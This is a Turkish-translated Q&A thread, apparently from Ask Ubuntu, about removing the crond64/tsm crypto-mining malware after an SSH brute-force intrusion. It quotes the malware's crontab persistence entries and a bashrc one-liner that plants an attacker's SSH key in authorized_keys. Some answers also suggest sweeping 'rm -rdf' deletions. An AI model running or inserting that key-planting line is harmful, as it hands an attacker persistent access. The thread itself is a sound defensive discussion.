Ubuntu'da crond64 / tsm virüsü


15

Son zamanlarda ev sunucumun acı çekmeye başladığını fark ettim. Tüm kaynaklar iki süreçle yenildi: crond64ve tsm. Onları defalarca öldürmeme rağmen tekrar tekrar ortaya çıktılar.

Aynı zamanda, ISS'm IP adresimden kaynaklanan bir kötüye kullanım hakkında beni bilgilendiriyordu:

==================== Excerpt from log for 178.22.105.xxx====================
Note: Local timezone is +0100 (CET)
Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx
Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 20:55:45 shared06 sshd[26722]: Failed password for invalid user admin from 178.22.105.xxx port 33532 ssh2
Jan 28 20:55:46 shared06 sshd[26722]: Received disconnect from 178.22.105.xxx port 33532:11: Bye Bye [preauth]
Jan 28 20:55:46 shared06 sshd[26722]: Disconnected from 178.22.105.xxx port 33532 [preauth]
Jan 28 21:12:05 shared06 sshd[30920]: Invalid user odm from 178.22.105.xxx
Jan 28 21:12:05 shared06 sshd[30920]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 21:12:07 shared06 sshd[30920]: Failed password for invalid user odm from 178.22.105.xxx port 45114 ssh2
Jan 28 21:12:07 shared06 sshd[30920]: Received disconnect from 178.22.105.xxx port 45114:11: Bye Bye [preauth]
Jan 28 21:12:07 shared06 sshd[30920]: Disconnected from 178.22.105.xxx port 45114 [preauth]

Bu web sitesi tarafından virüs bulaşmış olabilir. Tüm sabit diskimi tarayarak Sophos AV'yi çalıştırıyorum ve gerçekten de bazı virüsler buldu /tmp/.mountfs/.rsync. Bu yüzden tüm klasörü sildim ve bunun olduğunu düşündüm. Ama daha sonra geri gelmeye devam etti. Sonra kullanıcı cron dosyasını kontrol ettim /var/spool/cron/crontabs/kodi(virüs medya sunucumun kodi kullanıcısını kullanarak çalışıyordu), şöyle görünüyordu:

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Sun Feb  3 21:52:03 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* */12 * * * /home/kodi/.ttp/a/upd>/dev/null 2>&1
@reboot /home/kodi/.ttp/a/upd>/dev/null 2>&1
5 8 * * 0 /home/kodi/.ttp/b/sync>/dev/null 2>&1
@reboot /home/kodi/.ttp/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.mountfs/.rsync/c/aptitude>/dev/null 2>&1

Görünüşe göre, virüs başka bir dizinden arada bir kendini yeniden etkinleştiriyor. Bu dizinin içeriği:

>>> ls /home/kodi/.ttp/*
/home/kodi/.ttp/cron.d  /home/kodi/.ttp/dir2.dir

/home/kodi/.ttp/a:
a  bash.pid  config.txt  crond32  crond64  cronda  crondb  dir.dir  pools.txt  run  stop  upd

/home/kodi/.ttp/b:
a  dir.dir  rsync  run  stop  sync

/home/kodi/.ttp/c:
aptitude  dir.dir  go  ip  lib  n  p  run  slow  start  stop  tsm  tsm32  tsm64  v  watchdog

Tüm bu dosyaları ve crontab'daki girişleri sildim ve bununla umut, sorun çözüldü. Ancak, bunun hangi virüs olduğunu, onu nasıl yakalamış olabileceğimi (Kodi'ye bağlı olabilir) ve bunu önlemek için neler yapabileceğimi merak ediyorum. Neyse ki, sadece sınırlı haklara sahip bir kullanıcıdan geliyordu, ancak yine de başa çıkmak can sıkıcıydı.


DÜZENLE

Görünüşe göre bu virüsün tüm kalıntılarını kaldırdım (ayrıca tüm tmp klasörünü de kaldırdım), virüs geri gelmeye devam etti. ~/.ssh/authorized_hostsKesinlikle kendim koymadığım bir giriş olduğunu fark ettim . Bu, virüsün tekrar tekrar nasıl yeniden ekilebileceğini açıklar. Girişi kaldırdım, bu kullanıcı için girişi devre dışı bıraktım, şifre girişini devre dışı bıraktım (yalnızca şifre) ve şimdi standart olmayan bir bağlantı noktası kullandım.

Ayrıca sunucumda rasgele kullanıcı adları ile tekrar tekrar giriş denemeleri fark ettim, muhtemelen bir çeşit bot tarafından (günlük IP adresimden başlatılana şaşırtıcı bir şekilde benziyordu, bana ISS'm tarafından gönderildi). İlk başta bilgisayarıma bu şekilde bulaştı sanırım.


4
Zaten bir kez saldırıya uğradıysanız, diskte başka yerlerde virüs bulaşmış veya ihlal edilmiş başka şeyler olduğunu unutmayın. Muhtemelen sistemi havaya uçurup yeniden inşa etmelisiniz. Virüsler çok nadiren sadece bir uygulamayı etkiler ve genellikle diske yayılır.
Thomas Ward

Katılıyorum! Birisi sisteminize girdiyse sistemi silin ve sistem yedeklemesini geri yükleyin
Rinzwind

Tabii, bu tasarruf çözümü olacaktır. Ama bu sistemi yeni kurdum ve ne olduğunu anlamadan yeniden yüklemek istemedim. Dosyaları kopyalayarak, bu yeniden başlamış olabilir ve zamanımı boşa harcırdım.
erik

Muhtemelen, sisteminiz ihlal edildiğinden virüs yeniden bulaşmaya devam ediyor. Ben sistemi nuke ve taze baştan başlamak istiyorum.
Thomas Ward

1
Ayrıca kullanıcının Bashrc dosyasına enfeksiyonu bulunan: cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB... ...VKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~. Sadece cp /etc/skel/.bashrc /home/mycompromiseduser/kaldırmak için bir yaptım .
letsjump

Yanıtlar:


6

Ben de aynıydım. Hizmet rsync'i yükledi ve bazı dosyalar aldı. dota.tar.gzKullanıcı klasöründe bir dosya buldum .

  1. güvenlik duvarında giden bağlantı noktası 22'yi reddet (ör. ufw deny out 22)
  2. pkill -KILL -u kodi (bu, kullanıcı kodi'nin çalışan tüm işlemlerini öldürür)
  3. deluser kodi
  4. userhome kaldır
  5. rsync'i kaldır (bunu kullanmadım)
  6. Kaldırmak /tmp/.mountfs*

Lütfen bunun kodi için işleri mahvedeceğini unutmayın. Tüm kullanıcı evini kaldırmak yerine muhtemelen dota.tar.gz(varsa) ve .ttpklasörü kaldırabilirsiniz ( crontab'ı temizlemeyi unutmayın!)

Yeniden başlatmanın ardından artık giden bağlantı görmüyorum

netstat -peanut | grep 22

Enfeksiyon zayıf bir parola ile bir kullanıcı aracılığıyla oldu (varsayılan parolayla kodi hesabı belki?)


1

Benim durumumda, enfeksiyonun kaynağı, hesabını oluşturduğumdan (elbette ona söyledim) güvenli olmayan şifresini değiştirmeyen bir kullanıcıydı. Sunucum muhtemelen bazı listelerde: başarısız2ban'dan haftada yaklaşık 1000 yasak almak (yanlış kullanıcı veya şifre ile 4 kez deneyin ve bir ay boyunca engellenir)


1

Aynı kötü amaçlı yazılıma sahiptim. Giriş, ssh (varsayılan olmayan bağlantı noktası) aracılığıyla güvenli olmayan bir kullanıcı şifresi aracılığıyla yapıldı, yaklaşık 24 saat sonra tespit edildi ve kaldırıldı.

Benim durumumda, kullanıcının crontab silme rm -rdf /tmp/.*, rm -rdf /home/user/.*, killall -u useryeterliydi.


1

Bugün böyle bir şey vardı. Sistemi inceledim ve sistemimin yaklaşık bir ay boyunca izlerini bulduğunu gördüm ve ISP'm beni bilgilendirene kadar bu şeyin orada olduğunu fark etmedim.

Kötü amaçlı yazılım, güvensiz bir kullanıcı tarafından zayıf bir şifre ile geldi. Benim durumumda timemachine kullanıcısıydı. Penetrasyon günlüğü şöyle görünüyordu.

98341:Dec 23 23:45:36 fileserver sshd[23179]: Accepted password for timemachine from 46.101.149.19 port 45573 ssh2

Bu, XMRIG madencisi ve diğer IP'leri aynı zayıflıklar için tarayan bir istismar. Yani, bir makine düzinelerce başkalarına bulaşabilir. Bu siber saldırı hakkındaki MS raporuna göz atabilirsiniz .

Bu tür saldırılara karşı en etkili koruma, fail2bansunucunuza yüklenmek , ssh erişimini hız sınırlamak ve sunucunuzdaki SSH'ye erişebilen ufwsistemler için beyaz liste ACL'yi kullanmaktır.


0

Bu benim çözümüm (aynı zamanda bir crypo madenciliği kötü amaçlı yazılımı olarak adlandırır):

  1. crontab işlerini pkill
  2. Bu crontab işinin açıklaması yani: /home/xxx/.ttp/a/upd>/dev/null 2> & 1'i işaret eden her neyse temizleyin
  3. /tmp/.xxx/.rsync/c/aptitude>/dev/null 2> & 1 öğesini kaldır
  4. en önemlisi (beni oraya götürmek için uzun bir yol alır), aksi takdirde geri gelmeye devam edecektir: crontab -e'yi çalıştırın (bu kullanıcıya) crontab işinin üstünde bulacaksınız, hepsini silin, kaydedin.
  5. bağlantı noktası numarasını değiştirin.
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.